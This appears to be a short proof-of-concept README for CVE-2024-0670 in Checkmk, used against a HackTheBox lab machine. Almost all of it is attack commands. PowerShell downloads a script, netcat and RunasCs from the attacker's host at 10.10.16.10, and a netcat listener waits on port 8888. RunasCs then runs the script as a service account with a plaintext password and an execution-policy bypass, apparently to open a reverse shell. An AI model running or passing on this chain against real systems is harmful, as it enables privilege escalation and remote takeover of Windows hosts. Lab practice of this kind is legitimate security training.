# checkmk_cve-2024-0670
┌──(root㉿kali)-[/HTB/NanoCorp]
└─# python3 -m http.server 80
PS C:\windows\temp> iwr http://10.10.16.10/zh.ps1 -outfile "c:\windows\temp\zh.ps1"
PS C:\windows\temp> iwr http://10.10.16.10/nc64.exe -outfile "c:\windows\temp\nc64.exe"
PS C:\windows\temp> iwr http://10.10.16.10/RunasCs.exe -outfile "c:\windows\temp\RunasCs.exe"
┌──(root㉿kali)-[/HTB/NanoCorp]
└─# rlwrap -cAr nc -lvnp 8888
PS C:\windows\temp> .\RunasCs.exe web_svc "dksehdgh712!@#" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -File
C:\Windows\Temp\zh.ps1"
[4.0K] /data/pocs/eea9e80ab6144b38182ce5db74bf3b43f574ebeb
├── [ 719] README.md
└── [2.4K] zh.ps1
1 directory, 2 files